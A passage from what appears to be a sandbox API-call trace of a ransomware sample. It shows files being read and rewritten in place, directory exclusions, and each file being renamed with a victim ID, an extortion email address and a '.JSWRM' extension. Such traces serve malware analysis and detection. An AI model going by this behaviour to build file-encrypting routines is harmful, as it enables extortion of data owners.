| out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7140, lpOverlapped=0x0) returned 1 [0087.676] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.676] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7140, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7140, lpOverlapped=0x0) returned 1 [0087.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.677] CloseHandle (hObject=0x314) returned 1 [0087.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0087.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0087.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0087.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0087.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0087.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0087.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0087.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0087.678] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199279.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199279.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0087.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0087.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0087.679] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c4e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0199303.WMF", cAlternateFileName="")) returned 1 [0087.679] lstrcmpiW (lpString1="J0199303.WMF", lpString2=".") returned 1 [0087.679] lstrcmpiW (lpString1="J0199303.WMF", lpString2="..") returned 1 [0087.679] lstrcmpiW (lpString1="J0199303.WMF", lpString2="...") returned 1 [0087.679] lstrcmpiW (lpString1="J0199303.WMF", lpString2="windows") returned -1 [0087.679] lstrcmpiW (lpString1="J0199303.WMF", lpString2="recovery") returned -1 [0087.679] lstrcmpiW (lpString1="J0199303.WMF", lpString2="perflogs") returned -1 [0087.679] lstrcmpiW (lpString1="J0199303.WMF", lpString2="documents and settings") returned 1 [0087.679] lstrcmpiW (lpString1="J0199303.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.679] lstrcmpiW (lpString1="J0199303.WMF", lpString2="system volume information") returned -1 [0087.679] lstrcmpiW (lpString1="J0199303.WMF", lpString2="msocache") returned -1 [0087.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0087.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199303.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199303.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199303.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0087.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0087.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199303.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199303.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199303.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0087.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0087.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0087.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199303.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.680] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31822) returned 1 [0087.681] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7c40) returned 0x24d210 [0087.681] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7c40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7c40, lpOverlapped=0x0) returned 1 [0087.685] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.685] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7c40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7c40, lpOverlapped=0x0) returned 1 [0087.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.686] CloseHandle (hObject=0x314) returned 1 [0087.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0087.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0087.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0087.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0087.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0087.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0087.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.686] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199303.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199303.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0087.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0087.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0087.687] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc37e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0199307.WMF", cAlternateFileName="")) returned 1 [0087.687] lstrcmpiW (lpString1="J0199307.WMF", lpString2=".") returned 1 [0087.687] lstrcmpiW (lpString1="J0199307.WMF", lpString2="..") returned 1 [0087.687] lstrcmpiW (lpString1="J0199307.WMF", lpString2="...") returned 1 [0087.687] lstrcmpiW (lpString1="J0199307.WMF", lpString2="windows") returned -1 [0087.687] lstrcmpiW (lpString1="J0199307.WMF", lpString2="recovery") returned -1 [0087.688] lstrcmpiW (lpString1="J0199307.WMF", lpString2="perflogs") returned -1 [0087.688] lstrcmpiW (lpString1="J0199307.WMF", lpString2="documents and settings") returned 1 [0087.688] lstrcmpiW (lpString1="J0199307.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.688] lstrcmpiW (lpString1="J0199307.WMF", lpString2="system volume information") returned -1 [0087.688] lstrcmpiW (lpString1="J0199307.WMF", lpString2="msocache") returned -1 [0087.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0087.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199307.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199307.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199307.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0087.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0087.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199307.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199307.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199307.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0087.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0087.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0087.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199307.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.689] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=50046) returned 1 [0087.689] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc370) returned 0x24d210 [0087.690] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xc370, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xc370, lpOverlapped=0x0) returned 1 [0087.695] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.695] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xc370, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xc370, lpOverlapped=0x0) returned 1 [0087.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.696] CloseHandle (hObject=0x314) returned 1 [0087.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0087.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0087.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0087.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0087.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0087.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0087.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.697] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199307.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199307.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0087.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0087.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.698] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x662a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0199423.WMF", cAlternateFileName="")) returned 1 [0087.698] lstrcmpiW (lpString1="J0199423.WMF", lpString2=".") returned 1 [0087.698] lstrcmpiW (lpString1="J0199423.WMF", lpString2="..") returned 1 [0087.698] lstrcmpiW (lpString1="J0199423.WMF", lpString2="...") returned 1 [0087.698] lstrcmpiW (lpString1="J0199423.WMF", lpString2="windows") returned -1 [0087.698] lstrcmpiW (lpString1="J0199423.WMF", lpString2="recovery") returned -1 [0087.698] lstrcmpiW (lpString1="J0199423.WMF", lpString2="perflogs") returned -1 [0087.698] lstrcmpiW (lpString1="J0199423.WMF", lpString2="documents and settings") returned 1 [0087.698] lstrcmpiW (lpString1="J0199423.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.698] lstrcmpiW (lpString1="J0199423.WMF", lpString2="system volume information") returned -1 [0087.698] lstrcmpiW (lpString1="J0199423.WMF", lpString2="msocache") returned -1 [0087.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0087.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199423.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199423.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199423.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0087.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0087.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199423.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199423.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199423.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0087.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0087.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0087.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199423.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.699] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26154) returned 1 [0087.699] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6620) returned 0x24d210 [0087.699] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6620, lpOverlapped=0x0) returned 1 [0087.703] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.703] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6620, lpOverlapped=0x0) returned 1 [0087.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.703] CloseHandle (hObject=0x314) returned 1 [0087.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0087.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0087.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0087.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0087.703] RtlAllocateHeap 